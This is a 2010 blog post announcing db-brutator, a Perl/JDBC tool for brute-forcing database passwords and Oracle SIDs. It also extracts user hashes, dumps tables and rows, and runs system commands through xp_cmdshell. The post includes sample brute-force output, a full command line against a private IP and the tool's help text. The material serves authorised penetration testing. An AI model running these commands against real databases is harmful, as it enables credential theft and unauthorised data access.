vendredi 30 avril 2010

DB-BRUTATOR the Multi Database scanner/auditing tool !!

Hi there ,

I finally managed to take some time to release one of my tools:

db-brutator is a new database auditing tool written in Perl using JDBC drivers. It is very similar to oscanner for oracle databases but it does much more than just scanning for default accounts, it is designed to be flexible and easily customizable.

Why using it ? :

Because you want to audit all database servers with the same efficiency:
  1. Because you want to check for specific configuration for let's say with 100 different accounts
  2. Because you want to brute-force some of the accounts.
  3. Because you like to retrieve all database user hashes.
  4. Because you want to search for credentials in a huge database
Features:
  • Simple & efficient design
  • JDBC drivers => it means it can support every possible database system on the market
  • 100 % command line interface to be able to automate
  • Custom SQL query
  • Easy database Hash extraction to john format
  • Specifics Word lists included
  • multi-threaded
  • Unique of his kind (to my knowledge there is no equivalent on the net)
  • Multi OS (OSX,Linux,Win32)
  • Oracle SID bruteforce
  • Can extract Database structure (DBS,tables,columns)
  • Can extract X first rows of data of each tables
  • Designed by a pentester for pentesters :-P
  • Already been tested in "real life" conditions
  • License: Hmm let's say it's GPL but the JDBC drivers are not
Performances:
  • It depends on the database, here are the results for each type of database:
Starting JDBC driver proxy on port: 63145 with driver: net.sourceforge.jtds.jdbc.Driver
Done !
Bruteforcing Password length: 1 for user: test
Bruteforcing Password length: 2 for user: test
Bruteforcing Password length: 3 for user: test
Stopping JDBC driver proxy on port: 63145
Done !
DB-brutator Scan Finished at 10/08/2009 16:21:45 duration: 2 minutes 23 seconds on host: NA on port: 1433
DB-brutator Scan Speed: 335 auth/sec
Starting JDBC driver proxy on port: 60007 with driver: com.mysql.jdbc.Driver
Done !
Bruteforcing Password length: 1 for user: test
Bruteforcing Password length: 2 for user: test
Bruteforcing Password length: 3 for user: test
Stopping JDBC driver proxy on port: 60007
Done !
DB-brutator Scan Finished at 10/08/2009 16:25:21 duration: 2 minutes 46 seconds on host: NA on port: 3306
DB-brutator Scan Speed: 288 auth/sec

Starting JDBC driver proxy on port: 64297 with driver: oracle.jdbc.driver.OracleDriver
Done !
Bruteforcing Password length: 1 for user: sys as sysdba
Bruteforcing Password length: 2 for user: sys as sysdba
Bruteforcing Password length: 3 for user: sys as sysdba
DB-brutator Scan Finished at 10/08/2009 16:47:58 duration: 18 minutes 28 seconds on host: NA on port: 1521
DB-brutator Scan Speed: 43 auth/sec

Example:

Here is a typical use to extract the most information from a database if an account (with priv ;-P) is discovered, db-brutator will list all database user, grab their hashes if possible dump all tables and columns and finally extract the 5 first rows of data of each tables:
user@host: ~$ db-brutator -ho 192.168.142.160 -port 3306 -sgbd mysql -logins /usr/local/db-brutator/dict/common_user.dic -dblist -hash -table -col -data 5 -th 1 | spc -c /usr/local/db-brutator/conf/spcrc
Result:

using supercat (spc) to colorize the log


Online Help:

Here is the help message when your launch the db-brutator without any parameter
Usage:
bin/db-brutator.pl
[-logins loginsfilename or login/passwordfilename]
[-host hostname/ip]
[-port port]
[-sgbd mysql|oracle|mssql|sybase]
(-passwords filename)
(-domain Windows Domain for NTLM auth)
(-dbname sid) => database name (only useful for oracle because a SID is required to connect), if this param is empty and the database type is oracle then a bruteforce will be performed on the SID.
(-thread x)
(-m maxqueuesize) => maximum size of queue to store in memory, it is very useful to prevent a memory leak when using huge word lists.
(-v verbose)
(-deb debug)
(-delay delay between authentication)
(-o outputfilename)
(-u list user account)
(-dba list dba user account)
(-dblist list databases)
(-hash list user hashes)
(-sql execute custom SQL query)
(-cmd execute custom system command via xp_cmdshell MSSQL/SYBASE only)
(-table list database tables)
(-column list databases)
(-data N list the N first rows of data)
(-b bruteforce) => brute force mode using the default charset file
(-len max passwd length for bruteforce)
(-char bruteforce charset file)

Important Note:
  • Take care of the account lockout policy on Oracle Databases (this does not affect SYS account ...)
Known Bugs or limitations:
  • In bruteforce mode some JDBC drivers (JTDS) do not close properly the connection, it means that after some time you will reach the limit of the max open connection on your system.
TODO:
  • Implement a threadsafe print Queue
  • Add a regexp to extract credit card number (PCI compliance check)
  • write a nmap script to launch db-brutator once a known database service is found

Download:
source
debian package
package using repository

Please leave comments/bugs and share if you write any improvement on it.

Enjoy Database scanning !!
Publié par à Aucun commentaire:
Libellés : , , , , , , , , ,
Inscription à : Articles (Atom)